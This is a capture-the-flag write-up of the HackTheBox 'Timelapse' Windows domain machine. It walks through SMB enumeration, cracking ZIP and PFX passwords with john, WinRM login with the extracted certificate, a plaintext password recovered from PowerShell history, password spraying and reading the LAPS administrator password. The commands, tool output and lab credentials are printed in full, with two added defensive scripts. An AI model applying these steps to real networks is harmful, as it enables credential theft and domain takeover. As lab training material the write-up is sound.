AD · Easy · Windows

HTB — Timelapse

SMB share contains ZIP with password-protected PFX certificate. Cracked PFX used for WinRM. LAPS password read via LDAP for Administrator.

January 21, 2025 · HackTheBox
#AD #LAPS #PFX #WinRM

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 00:41 EST
Nmap scan report for 10.10.11.152
Host is up (0.024s latency).
Not shown: 65518 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-01-21 13:42:54Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
|_ssl-date: 2025-01-21T13:44:28+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49693/tcp open  msrpc             Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time: 
|   date: 2025-01-21T13:43:50
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   25.77 ms 10.10.14.1
2   25.87 ms 10.10.11.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.27 seconds
```

445

```sh
445/tcp   open  microsoft-ds?
```

```sh
smbclient -N -L \\\\10.10.11.152

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Shares          Disk      
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```sh
smbclient \\\\10.10.11.152\\Shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021
```

```sh
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

		6367231 blocks of size 4096. 1288040 blocks available
smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (24.8 KiloBytes/sec) (average 24.8 KiloBytes/sec)
```

```sh
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx    A    72683  Mon Oct 25 10:57:44 2021
```

```sh
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (4029.5 KiloBytes/sec) (average 2926.6 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (849.8 KiloBytes/sec) (average 2422.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (4232.1 KiloBytes/sec) (average 2839.4 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (676.0 KiloBytes/sec) (average 2535.3 KiloBytes/sec)
```

```sh
7c3XlgsE
```

winrm_backup.zip

```sh
unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
```

```sh
zip2john winrm_backup.zip > winrm_backup.hash
```

```sh
john winrm_backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx) 
```

```sh
unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
  inflating: winrm_backup/legacyy_dev_auth.pfx
```

pfx with evil-winrm

```sh
ls
legacyy_dev_auth.pfx
```

The .pfx itself is password-protected, so openssl cannot open it yet:

```sh
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub.pem
Enter Import Password:
```

Crack the PFX password with john (hash created with pfx2john, the .pfx counterpart of zip2john):

```sh
john legacyy_dev_auth.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx) 
```

extract public key from .pfx

```sh
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub.pem
Enter Import Password: thuglegacy
```

extract private key from .pfx

```sh
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv.pem
Enter Import Password: thuglegacy
```

  • https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/
```sh
evil-winrm -i 10.10.11.152 -c pub.pem -k priv.pem -S -r timelapse.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
```
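Added example, not code from the writeup: it builds a throwaway PFX shaped like legacyy_dev_auth.pfx, runs the same two openssl extraction steps without the interactive prompt, and then checks what makes such a file a credential rather than a harmless backup (a Client Authentication EKU plus a UPN in the SAN is what WinRM over TLS and PKINIT map to a user). It assumes the openssl CLI is installed; the subject, UPN and password are constructed.

```sh
#!/bin/sh
# Added example, not from the writeup: build a throwaway PFX shaped like
# legacyy_dev_auth.pfx, run the writeup's two openssl extraction steps without
# the interactive prompt, and check what makes the certificate a logon credential.
# Assumes the openssl CLI; subject, UPN and the password are constructed.
set -e
WORK=$(mktemp -d)

# Constructed sample: self-signed client-auth cert carrying a UPN in the SAN,
# exported to a password-protected PFX the way a "WinRM backup" would be.
make_sample_pfx() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -keyout "$WORK/key.pem" -out "$WORK/cert.pem" -subj "/CN=legacyy" \
    -addext "extendedKeyUsage=clientAuth" \
    -addext "subjectAltName=otherName:msUPN;UTF8:legacyy@timelapse.htb" >/dev/null 2>&1
  openssl pkcs12 -export -inkey "$WORK/key.pem" -in "$WORK/cert.pem" \
    -out "$WORK/sample.pfx" -passout pass:thuglegacy
}

# The writeup's steps (-clcerts -nokeys for the cert, -nocerts -nodes for the
# key), with the password passed via -passin instead of typed at the prompt.
extract_pfx() {  # $1 = pfx path, $2 = password
  openssl pkcs12 -in "$1" -clcerts -nokeys -out "$WORK/pub.pem" -passin "pass:$2"
  openssl pkcs12 -in "$1" -nocerts -nodes -out "$WORK/priv.pem" -passin "pass:$2"
}

# 0 when the cert carries the Client Authentication EKU: that is what lets it be
# presented to WinRM over TLS (or PKINIT) in place of the user's password, so a
# PFX like this deserves the same handling as a password, not a share in Dev\.
has_client_auth_eku() {  # $1 = cert pem
  openssl x509 -in "$1" -noout -text | grep -q "TLS Web Client Authentication"
}

# The UPN in the SAN is the account the DC maps the certificate to
# (older openssl builds print the otherName as <unsupported>; then this is empty).
cert_upn() {  # $1 = cert pem
  openssl x509 -in "$1" -noout -text | grep -o '[A-Za-z0-9._-]*@[A-Za-z0-9.-]*' || true
}

make_sample_pfx
extract_pfx "$WORK/sample.pfx" thuglegacy
openssl x509 -in "$WORK/pub.pem" -noout -subject -dates
has_client_auth_eku "$WORK/pub.pem" && echo "client-auth certificate: treat the PFX as a credential"
echo "maps to UPN: $(cert_upn "$WORK/pub.pem")"
```

The same checks applied to a real backup tell a defender whether a leaked .pfx needs the certificate revoked and the mapped account's credentials rotated.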
 

user.txt

```sh
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
1aea1a38...
```

winpeas

```sh
*Evil-WinRM* PS C:\users\legacyy> upload /home/sake/htb-labs/Timelapse/winrm_backup/winPEASx64.exe
```

powershell history

```sh
*Evil-WinRM* PS C:\> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```
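The history file is the whole pivot here: a password typed into ConvertTo-SecureString lands in PSReadLine's ConsoleHost_history.txt in clear text. Added example (not from the writeup) that scans such a file for the patterns seen above and reports hits with the quoted value redacted, so the report itself does not republish the secret; the sample history and the pattern list are constructed.

```sh
#!/bin/sh
# Added example, not from the writeup: find plaintext credentials left in a
# PSReadLine history file, the way svc_deploy's password leaked above.
# The sample history and the pattern list are constructed assumptions.
set -e
WORK=$(mktemp -d)

# Constructed sample, modelled on the ConsoleHost_history.txt found on the box.
cat > "$WORK/ConsoleHost_history.txt" <<'EOF'
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sup3rS3cret!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
net use \\fileserver\share /user:CORP\backup 'An0therOne'
get-aduser -filter * -properties *
EOF

# Prints "<file>:<line>:<entry>" for each entry that carries an inline secret,
# with the quoted value replaced by <redacted> so the report itself does not
# republish the password. Exits 0 when at least one hit was found, 1 otherwise.
scan_history() {  # $1 = history file
  awk -v f="$1" -v q="'" '
    tolower($0) ~ /asplaintext|\/user:|-password/ {
      line = $0
      gsub(q "[^" q "]*" q, q "<redacted>" q, line)
      gsub(/"[^"]*"/, "\"<redacted>\"", line)
      print f ":" NR ":" line
      hits++
    }
    END { exit (hits > 0) ? 0 : 1 }' "$1"
}

# Hit count only, handy when sweeping every profile under C:\Users.
count_hits() {  # $1 = history file
  scan_history "$1" | wc -l | tr -d ' '
}

scan_history "$WORK/ConsoleHost_history.txt"
```

On the real host the same sweep over every user's PSReadLine directory, plus rotating any credential it surfaces, closes the path that led from legacyy to svc_deploy.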

creds

E3R$Q62^12p7PLlC%KWaxuaV

```sh
*Evil-WinRM* PS C:\> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babywyrm                 Guest
krbtgt                   legacyy                  payl0ad
sinfulz                  svc_deploy               thecybergeek
TRX
The command completed with one or more errors
```

users

```txt
Administrator
sinfulz
TRX
babywyrm
legacyy
svc_deploy
Guest
payl0ad
thecybergeek
```

```sh
nxc smb 10.10.11.152 -u users.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV' --continue-on-success
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\Administrator:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\sinfulz:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\TRX:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\babywyrm:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\legacyy:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\Guest:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\payl0ad:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
SMB         10.10.11.152    445    DC01             [-] timelapse.htb\thecybergeek:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE 
```

creds

svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

winrm svc_deploy 5986 SSL

  • make sure to add the -S flag: only 5986 (WinRM over TLS) is open on this host, and without -S evil-winrm tries plain WinRM on 5985

Without -S the connection fails:

```sh
evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'
```

```sh
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 
```
 

bloodhound

```sh
sudo bloodhound-python -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -ns 10.10.11.152 -d timelapse.htb -c all

zip -r timelapse.zip *.json
```

domain admins

LAPS_READERS

```sh
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 11:12:37 AM
Password expires             Never
Password changeable          10/26/2021 11:12:37 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/21/2025 3:05:43 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.
```

ReadLAPSPassword

To abuse this privilege with PowerView's Get-DomainObject, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as a member of LAPS_READERS@TIMELAPSE.HTB if you are not running a process as a member. To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples come from the PowerView help documentation):

```sh
*Evil-WinRM* PS C:\Users\svc_deploy> upload /home/sake/htb-labs/Timelapse/PowerView.ps1
```

```powershell
$SecPassword = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TIMELAPSE\svc_deploy', $SecPassword)
```

Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as LAPS_READERS@TIMELAPSE.HTB:

```powershell
Get-DomainObject windows1 -Credential $Cred -Properties "ms-mcs-AdmPwd",name
```

  • https://github.com/p0dalirius/pyLAPS

```sh
python3 pyLAPS.py --action get -d "TIMELAPSE" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV' 
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | DC01$                : b[44$81@&495U8KI2)Kq,-Fs
[+] All done!
```

```sh
nxc smb 10.10.11.152 -u /home/sake/htb-labs/Timelapse/users.txt -p 'b[44$81@&495U8KI2)Kq,-Fs' --continue-on-success
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\Administrator:b[44$81@&495U8KI2)Kq,-Fs (Pwn3d!)
```

  • password is different because I reset the lab

```sh
evil-winrm -i 10.10.11.152 -u administrator -p 'Rjd[6ayf!]ka{6M8jnyb$769' -S 
```

root.txt

```sh
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
c7a9e40c...
```